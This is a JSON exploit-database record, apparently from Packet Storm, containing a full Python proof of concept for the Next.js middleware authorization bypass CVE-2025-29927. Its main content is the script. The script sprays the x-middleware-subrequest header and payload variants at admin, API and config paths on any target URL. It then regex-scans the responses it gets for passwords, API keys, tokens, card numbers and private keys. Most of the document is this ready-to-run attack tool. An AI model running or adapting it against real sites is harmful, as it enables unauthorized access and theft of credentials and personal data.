{“lastseen”:”2026-02-09T16:16:55″,”description”:”This Python script checks whether a website built with Next.js is vulnerable to CVE\u20112025\u201129927, a middleware authorization bypass flaw triggered by the request header:x-middleware-subrequest…”,”published”:”2026-02-09T00:00:00″,”modified”:”2026-02-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Next.js 15.2.3 Middleware Authorization Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:215166″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-29927″],”sourceData”:”=============================================================================================================================================\\n | # Title : Next.js 15.2.3 Middleware Authorization Bypass Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/nextjs.org\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212394\/ \\u0026\\tCVE-2025-29927\\n \\n [+] Summary : This Python script checks whether a website built with Next.js is vulnerable to CVE\u20112025\u201129927, \\n a middleware authorization bypass flaw triggered by the request header:x-middleware-subrequest\\n \\n [+] What the script does:\\n \\n Attempts to detect the Next.js version automatically.\\n \\n Determines whether the detected version is potentially vulnerable.\\n \\n Sends both normal requests and bypass requests (with the special header) to common sensitive endpoints.\\n \\n Compares responses to identify differences that may indicate bypass or unauthorized access.\\n \\n [+] Result:\\n \\n If the response returned with the bypass header differs significantly from the normal request (status code or body), the target may be vulnerable.\\n \\n In short:\\n The script detects and tests for the Next.js middleware bypass vulnerability (CVE\u20112025\u201129927).\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n \\n Usage: python3 poc.py https:\/\/target.com\\n \\”\\”\\”\\n \\n import requests\\n import sys\\n import json\\n import time\\n from urllib.parse import urljoin, urlparse\\n from concurrent.futures import ThreadPoolExecutor\\n import argparse\\n import colorama\\n from colorama import Fore, Style\\n \\n colorama.init()\\n \\n class NextJSBypassPOC:\\n def __init__(self, target_url, proxy=None, cookies=None):\\n self.target = target_url.rstrip(‘\/’)\\n self.session = requests.Session()\\n self.vulnerable_endpoints = []\\n self.found_data = []\\n \\n if proxy:\\n self.session.proxies = {\\n ‘http’: proxy,\\n ‘https’: proxy\\n }\\n \\n if cookies:\\n self.session.headers.update({‘Cookie’: cookies})\\n \\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Accept-Encoding’: ‘gzip, deflate’,\\n ‘Connection’: ‘close’,\\n ‘Upgrade-Insecure-Requests’: ‘1’\\n })\\n \\n def print_banner(self):\\n banner = f\\”\\”\\”\\n {Fore.RED}\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Next.js Middleware Authentication Bypass PoC \u2551\\n \u2551 CVE-2025-29927 – Critical Security Vulnerability \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n {Style.RESET_ALL}\\n Target: {self.target}\\n Time: {time.strftime(‘%Y-%m-%d %H:%M:%S’)}\\n \\”\\”\\”\\n print(banner)\\n \\n def test_bypass(self, endpoint, payload=\\”middleware\\”):\\n \\”\\”\\”\u0627\u062e\u062a\u0628\u0627\u0631 bypass \u0639\u0644\u0649 \u0646\u0642\u0637\u0629 \u0646\u0647\u0627\u064a\u0629 \u0645\u062d\u062f\u062f\u0629\\”\\”\\”\\n url = urljoin(self.target, endpoint)\\n \\n try:\\n # Request \u0639\u0627\u062f\u064a\u0629 (\u064a\u062c\u0628 \u0623\u0646 \u062a\u0631\u062c\u0639 401\/403 \u0625\u0630\u0627 \u0643\u0627\u0646\u062a \u0645\u062d\u0645\u064a\u0629)\\n normal_response = self.session.get(url, timeout=10)\\n \\n # Request \u0645\u0639 header \u0627\u0644\u0640 bypass\\n bypass_headers = {\\n ‘x-middleware-subrequest’: payload,\\n ‘x-forwarded-for’: ‘127.0.0.1’,\\n ‘x-real-ip’: ‘127.0.0.1’\\n }\\n \\n bypass_response = self.session.get(\\n url, \\n headers=bypass_headers, \\n timeout=10,\\n allow_redirects=False\\n )\\n \\n # \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\n is_vulnerable = self.analyze_responses(\\n normal_response, \\n bypass_response, \\n endpoint, \\n payload\\n )\\n \\n return {\\n ‘endpoint’: endpoint,\\n ‘url’: url,\\n ‘normal_status’: normal_response.status_code,\\n ‘normal_length’: len(normal_response.content),\\n ‘bypass_status’: bypass_response.status_code,\\n ‘bypass_length’: len(bypass_response.content),\\n ‘payload’: payload,\\n ‘vulnerable’: is_vulnerable,\\n ‘response_sample’: bypass_response.text[:500] if is_vulnerable else None\\n }\\n \\n except Exception as e:\\n print(f\\”{Fore.YELLOW}[!] Error testing {endpoint}: {e}{Style.RESET_ALL}\\”)\\n return None\\n \\n def analyze_responses(self, normal, bypass, endpoint, payload):\\n \\”\\”\\”\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0641\u0631\u0648\u0642 \u0628\u064a\u0646 \u0627\u0644\u0631\u062f\u0648\u062f\\”\\”\\”\\n \\n # \u062d\u0627\u0644\u0629 1: \u0627\u0644\u0640 bypass \u064a\u0633\u0645\u062d \u0628\u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0635\u0641\u062d\u0629 \u0643\u0627\u0646\u062a \u0645\u062d\u0638\u0648\u0631\u0629\\n if normal.status_code in [401, 403, 404] and bypass.status_code == 200:\\n print(f\\”{Fore.GREEN}[+] SUCCESS! Bypass worked on {endpoint}\\”)\\n print(f\\” Normal: {normal.status_code} | Bypass: {bypass.status_code}{Style.RESET_ALL}\\”)\\n return True\\n \\n # \u062d\u0627\u0644\u0629 2: \u062a\u063a\u064a\u064a\u0631 \u0641\u064a \u0645\u062d\u062a\u0648\u0649 \u0627\u0644\u0631\u062f\\n if bypass.status_code == 200 and normal.status_code == 200:\\n if bypass.content != normal.content:\\n print(f\\”{Fore.CYAN}[+] Content difference on {endpoint}\\”)\\n print(f\\” Length difference: {len(bypass.content) – len(normal.content)} bytes{Style.RESET_ALL}\\”)\\n return True\\n \\n # \u062d\u0627\u0644\u0629 3: \u062a\u063a\u064a\u064a\u0631 \u0641\u064a \u0627\u0644\u0640 status code\\n if normal.status_code != bypass.status_code:\\n print(f\\”{Fore.BLUE}[+] Status code changed on {endpoint}\\”)\\n print(f\\” {normal.status_code} -\\u003e {bypass.status_code}{Style.RESET_ALL}\\”)\\n return True\\n \\n return False\\n \\n def discover_endpoints(self):\\n \\”\\”\\”\u0627\u0643\u062a\u0634\u0627\u0641 \u0646\u0642\u0627\u0637 \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u062a\u0644\u0642\u0627\u0626\u064a\u0627\u064b\\”\\”\\”\\n endpoints = []\\n \\n # \u0642\u0627\u0626\u0645\u0629 \u0646\u0642\u0627\u0637 \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u0627\u0644\u0634\u0627\u0626\u0639\u0629\\n common_paths = [\\n \\”\/admin\\”, \\”\/admin\/login\\”, \\”\/admin\/dashboard\\”, \\”\/admin\/panel\\”,\\n \\”\/api\\”, \\”\/api\/auth\\”, \\”\/api\/admin\\”, \\”\/api\/users\\”, \\”\/api\/config\\”,\\n \\”\/dashboard\\”, \\”\/profile\\”, \\”\/account\\”, \\”\/settings\\”, \\”\/user\\”,\\n \\”\/private\\”, \\”\/internal\\”, \\”\/secure\\”, \\”\/protected\\”,\\n \\”\/wp-admin\\”, \\”\/wp-login\\”, \\”\/cpanel\\”, \\”\/control\\”,\\n \\”\/_next\\”, \\”\/_next\/data\\”, \\”\/_next\/static\\”, \\”\/_next\/webpack\\”,\\n \\”\/api\/private\\”, \\”\/api\/internal\\”, \\”\/api\/secure\\”,\\n \\”\/management\\”, \\”\/system\\”, \\”\/config\\”, \\”\/backup\\”,\\n \\”\/test\\”, \\”\/debug\\”, \\”\/console\\”, \\”\/shell\\”,\\n \\”\/api\/v1\\”, \\”\/api\/v2\\”, \\”\/api\/v3\\”,\\n \\”\/api\/v1\/admin\\”, \\”\/api\/v1\/user\\”, \\”\/api\/v1\/config\\”,\\n \\”\/graphql\\”, \\”\/graphql\/v1\\”, \\”\/graphql\/admin\\”,\\n \\”\/swagger\\”, \\”\/swagger-ui\\”, \\”\/api-docs\\”,\\n \\”\/actuator\\”, \\”\/health\\”, \\”\/metrics\\”, \\”\/info\\”,\\n \\”\/phpmyadmin\\”, \\”\/mysql\\”, \\”\/sql\\”, \\”\/db\\”,\\n \\”\/vendor\\”, \\”\/storage\\”, \\”\/uploads\\”, \\”\/downloads\\”\\n ]\\n \\n # \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0646 robots.txt\\n try:\\n robots = self.session.get(urljoin(self.target, \\”\/robots.txt\\”), timeout=5)\\n if robots.status_code == 200:\\n for line in robots.text.split(‘\\\\n’):\\n if line.startswith(‘Disallow:’):\\n path = line.split(‘: ‘)[1] if ‘: ‘ in line else line[9:]\\n if path.strip() and path not in endpoints:\\n endpoints.append(path.strip())\\n except:\\n pass\\n \\n # \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0646 sitemap.xml\\n try:\\n sitemap = self.session.get(urljoin(self.target, \\”\/sitemap.xml\\”), timeout=5)\\n if sitemap.status_code == 200:\\n import re\\n urls = re.findall(r’\\u003cloc\\u003e(.*?)\\u003c\/loc\\u003e’, sitemap.text)\\n for url in urls:\\n path = urlparse(url).path\\n if path and path not in endpoints:\\n endpoints.append(path)\\n except:\\n pass\\n \\n return endpoints + common_paths\\n \\n def test_payload_variations(self, endpoint):\\n \\”\\”\\”\u062a\u062c\u0631\u0628\u0629 \u0623\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u0629 \u0645\u0646 payloads\\”\\”\\”\\n payloads = [\\n # Basic bypass\\n \\”middleware\\”,\\n \\”1\\”,\\n \\”true\\”,\\n \\”yes\\”,\\n \\”on\\”,\\n \\”enable\\”,\\n \\n # Multiple values\\n \\”middleware:middleware\\”,\\n \\”middleware:middleware:middleware\\”,\\n \\”middleware:middleware:middleware:middleware\\”,\\n \\”middleware:middleware:middleware:middleware:middleware\\”,\\n \\n # With newlines\\n \\”middleware\\\\nx-forwarded-for: 127.0.0.1\\”,\\n \\”middleware\\\\r\\\\nx-forwarded-for: 127.0.0.1\\”,\\n \\n # Special characters\\n \\”middleware;\\”,\\n \\”middleware%00\\”,\\n \\”middleware%0a\\”,\\n \\”middleware%0d\\”,\\n \\n # Case variations\\n \\”Middleware\\”,\\n \\”MIDDLEWARE\\”,\\n \\”mIdDlEwArE\\”,\\n \\n # Other headers\\n \\”x-middleware-subrequest\\”,\\n \\”next-middleware\\”,\\n \\”next-js-middleware\\”\\n ]\\n \\n results = []\\n for payload in payloads:\\n result = self.test_bypass(endpoint, payload)\\n if result and result[‘vulnerable’]:\\n results.append(result)\\n # \u062d\u0641\u0638 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0643\u0634\u0648\u0641\u0629\\n if result[‘response_sample’]:\\n self.found_data.append({\\n ‘endpoint’: endpoint,\\n ‘payload’: payload,\\n ‘data’: result[‘response_sample’]\\n })\\n \\n return results\\n \\n def exploit_sensitive_data(self, vulnerable_endpoints):\\n \\”\\”\\”\u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0645\u0646 \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u064a\u0641\u0629\\”\\”\\”\\n sensitive_patterns = [\\n (r’password[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘Passwords’),\\n (r’api[_-]?key[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘API Keys’),\\n (r’token[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘Tokens’),\\n (r’secret[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘Secrets’),\\n (r’admin[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘Admin Credentials’),\\n (r’email[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘Emails’),\\n (r’user[=:][\\”\\\\’]?(.*?)[\\”\\\\’ ]’, ‘Usernames’),\\n (r'([0-9]{16})[0-9]{3}’, ‘Credit Cards (Potential)’),\\n (r’—–BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY—–‘, ‘Private Keys’)\\n ]\\n \\n print(f\\”\\\\n{Fore.MAGENTA}[*] Scanning for sensitive data…{Style.RESET_ALL}\\”)\\n \\n for endpoint_info in vulnerable_endpoints:\\n if endpoint_info.get(‘response_sample’):\\n data = endpoint_info[‘response_sample’]\\n for pattern, label in sensitive_patterns:\\n import re\\n matches = re.findall(pattern, data, re.IGNORECASE)\\n if matches:\\n print(f\\”{Fore.RED}[!] Found {label} in {endpoint_info[‘endpoint’]}{Style.RESET_ALL}\\”)\\n for match in matches[:3]: # \u0639\u0631\u0636 \u0623\u0648\u0644 3 \u0646\u062a\u0627\u0626\u062c \u0641\u0642\u0637\\n if isinstance(match, tuple):\\n match = match[0]\\n print(f\\” {match[:50]}…\\”)\\n \\n def run_scan(self, threads=5):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0633\u062d \u0627\u0644\u0643\u0627\u0645\u0644\\”\\”\\”\\n self.print_banner()\\n \\n print(f\\”{Fore.CYAN}[*] Discovering endpoints…{Style.RESET_ALL}\\”)\\n endpoints = self.discover_endpoints()\\n print(f\\”[*] Found {len(endpoints)} endpoints to test\\”)\\n \\n print(f\\”\\\\n{Fore.CYAN}[*] Testing for bypass vulnerability…{Style.RESET_ALL}\\”)\\n \\n # \u0627\u0633\u062a\u062e\u062f\u0627\u0645 threads \u0644\u0644\u0645\u0633\u062d \u0627\u0644\u0633\u0631\u064a\u0639\\n with ThreadPoolExecutor(max_workers=threads) as executor:\\n futures = []\\n for endpoint in endpoints:\\n futures.append(executor.submit(self.test_payload_variations, endpoint))\\n \\n for future in futures:\\n try:\\n results = future.result(timeout=30)\\n if results:\\n self.vulnerable_endpoints.extend(results)\\n except Exception as e:\\n continue\\n \\n # \u0639\u0631\u0636 \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\n self.print_results()\\n \\n # \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629\\n if self.vulnerable_endpoints:\\n self.exploit_sensitive_data(self.vulnerable_endpoints)\\n \\n return self.vulnerable_endpoints\\n \\n def print_results(self):\\n \\”\\”\\”\u0637\u0628\u0627\u0639\u0629 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0628\u0634\u0643\u0644 \u0645\u0646\u0638\u0645\\”\\”\\”\\n print(f\\”\\\\n{Fore.YELLOW}\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.CYAN}[*] SCAN COMPLETED{Style.RESET_ALL}\\”)\\n print(f\\”[*] Total vulnerable endpoints: {len(self.vulnerable_endpoints)}\\”)\\n \\n if self.vulnerable_endpoints:\\n print(f\\”\\\\n{Fore.GREEN}[+] VULNERABLE ENDPOINTS:{Style.RESET_ALL}\\”)\\n for i, vuln in enumerate(self.vulnerable_endpoints, 1):\\n print(f\\”\\\\n{i}. {Fore.GREEN}{vuln[‘endpoint’]}{Style.RESET_ALL}\\”)\\n print(f\\” URL: {vuln[‘url’]}\\”)\\n print(f\\” Payload: {vuln[‘payload’]}\\”)\\n print(f\\” Normal: HTTP {vuln[‘normal_status’]} ({vuln[‘normal_length’]} bytes)\\”)\\n print(f\\” Bypass: HTTP {vuln[‘bypass_status’]} ({vuln[‘bypass_length’]} bytes)\\”)\\n \\n if vuln[‘response_sample’]:\\n print(f\\” Sample: {vuln[‘response_sample’][:100]}…\\”)\\n else:\\n print(f\\”{Fore.RED}[-] No vulnerable endpoints found{Style.RESET_ALL}\\”)\\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=’Next.js CVE-2025-29927 Authentication Bypass PoC’\\n )\\n parser.add_argument(‘target’, help=’Target URL (e.g., https:\/\/example.com)’)\\n parser.add_argument(‘-t’, ‘–threads’, type=int, default=5, \\n help=’Number of threads (default: 5)’)\\n parser.add_argument(‘-p’, ‘–proxy’, help=’Proxy server (e.g., http:\/\/127.0.0.1:8080)’)\\n parser.add_argument(‘-c’, ‘–cookies’, help=’Cookies for authenticated session’)\\n parser.add_argument(‘-o’, ‘–output’, help=’Output file for results’)\\n parser.add_argument(‘–timeout’, type=int, default=10,\\n help=’Request timeout in seconds’)\\n \\n args = parser.parse_args()\\n \\n # \u0625\u0646\u0634\u0627\u0621 \u0643\u0627\u0626\u0646 \u0627\u0644\u0645\u0633\u062d \u0648\u062a\u0634\u063a\u064a\u0644\u0647\\n scanner = NextJSBypassPOC(\\n target_url=args.target,\\n proxy=args.proxy,\\n cookies=args.cookies\\n )\\n \\n try:\\n results = scanner.run_scan(threads=args.threads)\\n \\n # \u062d\u0641\u0638 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0625\u0630\u0627 \u0637\u0644\u0628\\n if args.output and results:\\n import json\\n with open(args.output, ‘w’) as f:\\n json.dump(results, f, indent=2)\\n print(f\\”\\\\n{Fore.GREEN}[+] Results saved to {args.output}{Style.RESET_ALL}\\”)\\n \\n except KeyboardInterrupt:\\n print(f\\”\\\\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}\\”)\\n sys.exit(0)\\n except Exception as e:\\n print(f\\”{Fore.RED}[!] Error: {e}{Style.RESET_ALL}\\”)\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n if len(sys.argv) \\u003c 2:\\n print(f\\”Usage: {sys.argv[0]} \\u003ctarget_url\\u003e [options]\\”)\\n print(\\”\\\\nExample: python3 poc.py https:\/\/vulnerable-site.com -t 10 -o results.json\\”)\\n sys.exit(1)\\n \\n main()\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215166″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215166\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-09T16:16:55″,”description”:”This Python script checks whether a website built with Next.js is vulnerable to CVE\u20112025\u201129927, a middleware authorization bypass flaw triggered by the request header:x-middleware-subrequest…”,”published”:”2026-02-09T00:00:00″,”modified”:”2026-02-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Next.js…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-39823","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n